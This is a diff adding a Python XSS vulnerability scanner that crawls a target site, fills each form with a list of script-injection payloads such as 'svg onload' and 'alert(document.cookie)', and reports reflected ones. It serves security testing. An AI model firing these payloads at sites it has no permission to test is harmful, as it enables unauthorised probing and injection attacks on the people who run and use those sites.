|
| 1 | +importrequests# Importing requests library for making HTTP requests |
| 2 | +frompprintimportpprint# Importing pprint for pretty-printing data structures |
| 3 | +frombs4importBeautifulSoupasbs# Importing BeautifulSoup for HTML parsing |
| 4 | +fromurllib.parseimporturljoin,urlparse# Importing utilities for URL manipulation |
| 5 | +fromurllib.robotparserimportRobotFileParser# Importing RobotFileParser for parsing robots.txt files |
| 6 | +fromcoloramaimportFore,Style# Importing colorama for colored terminal output |
| 7 | +importargparse# Importing argparse for command-line argument parsing |
| 8 | + |
| 9 | +# List of XSS payloads to test forms with |
| 10 | +XSS_PAYLOADS= [ |
| 11 | +'"><svg/onload=alert(1)>', |
| 12 | +'\'><svg/onload=alert(1)>', |
| 13 | +'<img src=x onerror=alert(1)>', |
| 14 | +'"><img src=x onerror=alert(1)>', |
| 15 | +'\'><img src=x onerror=alert(1)>', |
| 16 | +"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//--></script>", |
| 17 | +"<Script>alert('XSS')</scripT>", |
| 18 | +"<script>alert(document.cookie)</script>", |
| 19 | +] |
| 20 | +# global variable to store all crawled links |
| 21 | +crawled_links=set() |
| 22 | + |
| 23 | +defprint_crawled_links(): |
| 24 | +""" |
| 25 | + Print all crawled links |
| 26 | + """ |
| 27 | +print(f"\n[+] Links crawled:") |
| 28 | +forlinkincrawled_links: |
| 29 | +print(f"{link}") |
| 30 | +print() |
| 31 | + |
| 32 | + |
| 33 | +# Function to get all forms from a given URL |
| 34 | +defget_all_forms(url): |
| 35 | +"""Given a `url`, it returns all forms from the HTML content""" |
| 36 | +try: |
| 37 | +# Using BeautifulSoup to parse HTML content of the URL |
| 38 | +soup=bs(requests.get(url).content,"html.parser") |
| 39 | +# Finding all form elements in the HTML |
| 40 | +returnsoup.find_all("form") |
| 41 | +exceptrequests.exceptions.RequestExceptionase: |
| 42 | +# Handling exceptions if there's an error in retrieving forms |
| 43 | +print(f"[-] Error retrieving forms from{url}:{e}") |
| 44 | +return [] |
| 45 | + |
| 46 | +# Function to extract details of a form |
| 47 | +defget_form_details(form): |
| 48 | +""" |
| 49 | + This function extracts all possible useful information about an HTML `form` |
| 50 | + """ |
| 51 | +details= {} |
| 52 | +# Extracting form action and method |
| 53 | +action=form.attrs.get("action","").lower() |
| 54 | +method=form.attrs.get("method","get").lower() |
| 55 | +inputs= [] |
| 56 | +# Extracting input details within the form |
| 57 | +forinput_taginform.find_all("input"): |
| 58 | +input_type=input_tag.attrs.get("type","text") |
| 59 | +input_name=input_tag.attrs.get("name") |
| 60 | +inputs.append({"type":input_type,"name":input_name}) |
| 61 | +# Storing form details in a dictionary |
| 62 | +details["action"]=action |
| 63 | +details["method"]=method |
| 64 | +details["inputs"]=inputs |
| 65 | +returndetails |
| 66 | + |
| 67 | +# Function to submit a form with a specific value |
| 68 | +defsubmit_form(form_details,url,value): |
| 69 | +""" |
| 70 | + Submits a form given in `form_details` |
| 71 | + Params: |
| 72 | + form_details (list): a dictionary that contains form information |
| 73 | + url (str): the original URL that contains that form |
| 74 | + value (str): this will be replaced for all text and search inputs |
| 75 | + Returns the HTTP Response after form submission |
| 76 | + """ |
| 77 | +target_url=urljoin(url,form_details["action"])# Constructing the absolute form action URL |
| 78 | +inputs=form_details["inputs"] |
| 79 | +data= {} |
| 80 | +# Filling form inputs with the provided value |
| 81 | +forinputininputs: |
| 82 | +ifinput["type"]=="text"orinput["type"]=="search": |
| 83 | +input["value"]=value |
| 84 | +input_name=input.get("name") |
| 85 | +input_value=input.get("value") |
| 86 | +ifinput_nameandinput_value: |
| 87 | +data[input_name]=input_value |
| 88 | +try: |
| 89 | +# Making the HTTP request based on the form method (POST or GET) |
| 90 | +ifform_details["method"]=="post": |
| 91 | +returnrequests.post(target_url,data=data) |
| 92 | +else: |
| 93 | +returnrequests.get(target_url,params=data) |
| 94 | +exceptrequests.exceptions.RequestExceptionase: |
| 95 | +# Handling exceptions if there's an error in form submission |
| 96 | +print(f"[-] Error submitting form to{target_url}:{e}") |
| 97 | +returnNone |
| 98 | + |
| 99 | + |
| 100 | +defget_all_links(url): |
| 101 | +""" |
| 102 | + Given a `url`, it returns all links from the HTML content |
| 103 | + """ |
| 104 | +try: |
| 105 | +# Using BeautifulSoup to parse HTML content of the URL |
| 106 | +soup=bs(requests.get(url).content,"html.parser") |
| 107 | +# Finding all anchor elements in the HTML |
| 108 | +return [urljoin(url,link.get("href"))forlinkinsoup.find_all("a")] |
| 109 | +exceptrequests.exceptions.RequestExceptionase: |
| 110 | +# Handling exceptions if there's an error in retrieving links |
| 111 | +print(f"[-] Error retrieving links from{url}:{e}") |
| 112 | +return [] |
| 113 | + |
| 114 | + |
| 115 | +# Function to scan for XSS vulnerabilities |
| 116 | +defscan_xss(args,scanned_urls=None): |
| 117 | +"""Given a `url`, it prints all XSS vulnerable forms and |
| 118 | + returns True if any is vulnerable, None if already scanned, False otherwise""" |
| 119 | +globalcrawled_links |
| 120 | +ifscanned_urlsisNone: |
| 121 | +scanned_urls=set() |
| 122 | +# Checking if the URL is already scanned |
| 123 | +ifargs.urlinscanned_urls: |
| 124 | +return |
| 125 | +# Adding the URL to the scanned URLs set |
| 126 | +scanned_urls.add(args.url) |
| 127 | +# Getting all forms from the given URL |
| 128 | +forms=get_all_forms(args.url) |
| 129 | +print(f"\n[+] Detected{len(forms)} forms on{args.url}") |
| 130 | +# Parsing the URL to get the domain |
| 131 | +parsed_url=urlparse(args.url) |
| 132 | +domain=f"{parsed_url.scheme}://{parsed_url.netloc}" |
| 133 | +ifargs.obey_robots: |
| 134 | +robot_parser=RobotFileParser() |
| 135 | +robot_parser.set_url(urljoin(domain,"/robots.txt")) |
| 136 | +try: |
| 137 | +robot_parser.read() |
| 138 | +exceptExceptionase: |
| 139 | +# Handling exceptions if there's an error in reading robots.txt |
| 140 | +print(f"[-] Error reading robots.txt file for{domain}:{e}") |
| 141 | +crawl_allowed=False |
| 142 | +else: |
| 143 | +crawl_allowed=robot_parser.can_fetch("*",args.url) |
| 144 | +else: |
| 145 | +crawl_allowed=True |
| 146 | +ifcrawl_allowedorparsed_url.path: |
| 147 | +forforminforms: |
| 148 | +form_details=get_form_details(form) |
| 149 | +form_vulnerable=False |
| 150 | +# Testing each form with XSS payloads |
| 151 | +forpayloadinXSS_PAYLOADS: |
| 152 | +response=submit_form(form_details,args.url,payload) |
| 153 | +ifresponseandpayloadinresponse.content.decode(): |
| 154 | +print(f"\n{Fore.GREEN}[+] XSS Vulnerability Detected on{args.url}{Style.RESET_ALL}") |
| 155 | +print(f"[*] Form Details:") |
| 156 | +pprint(form_details) |
| 157 | +print(f"{Fore.YELLOW}[*] Payload:{payload}{Style.RESET_ALL}") |
| 158 | +# save to a file if output file is provided |
| 159 | +ifargs.output: |
| 160 | +withopen(args.output,"a")asf: |
| 161 | +f.write(f"URL:{args.url}\n") |
| 162 | +f.write(f"Form Details:{form_details}\n") |
| 163 | +f.write(f"Payload:{payload}\n") |
| 164 | +f.write("-"*50+"\n\n") |
| 165 | +form_vulnerable=True |
| 166 | +break# No need to try other payloads for this endpoint |
| 167 | +ifnotform_vulnerable: |
| 168 | +print(f"{Fore.MAGENTA}[-] No XSS vulnerability found on{args.url}{Style.RESET_ALL}") |
| 169 | +# Crawl links if the option is enabled |
| 170 | +ifargs.crawl: |
| 171 | +print(f"\n[+] Crawling links from{args.url}") |
| 172 | +try: |
| 173 | +# Crawling links from the given URL |
| 174 | +links=get_all_links(args.url) |
| 175 | +exceptrequests.exceptions.RequestExceptionase: |
| 176 | +# Handling exceptions if there's an error in crawling links |
| 177 | +print(f"[-] Error crawling links from{args.url}:{e}") |
| 178 | +links= [] |
| 179 | +forlinkinset(links):# Removing duplicates |
| 180 | +iflink.startswith(domain): |
| 181 | +crawled_links.add(link) |
| 182 | +ifargs.max_linksandlen(crawled_links)>=args.max_links: |
| 183 | +print(f"{Fore.CYAN}[-] Maximum links ({args.max_links}) limit reached. Exiting...{Style.RESET_ALL}") |
| 184 | +print_crawled_links() |
| 185 | +exit(0) |
| 186 | +# Recursively scanning XSS vulnerabilities for crawled links |
| 187 | +args.url=link |
| 188 | +link_vulnerable=scan_xss(args,scanned_urls) |
| 189 | +ifnotlink_vulnerable: |
| 190 | +continue |
| 191 | + |
| 192 | +if__name__=="__main__": |
| 193 | +parser=argparse.ArgumentParser(description="Extended XSS Vulnerability scanner script.") |
| 194 | +parser.add_argument("url",help="URL to scan for XSS vulnerabilities") |
| 195 | +parser.add_argument("-c","--crawl",action="store_true",help="Crawl links from the given URL") |
| 196 | +# max visited links |
| 197 | +parser.add_argument("-m","--max-links",type=int,default=0,help="Maximum number of links to visit. Default 0, which means no limit.") |
| 198 | +parser.add_argument("--obey-robots",action="store_true",help="Obey robots.txt rules") |
| 199 | +parser.add_argument("-o","--output",help="Output file to save the results") |
| 200 | +args=parser.parse_args() |
| 201 | +scan_xss(args)# Initiating XSS vulnerability scan |
| 202 | + |
| 203 | +print_crawled_links() |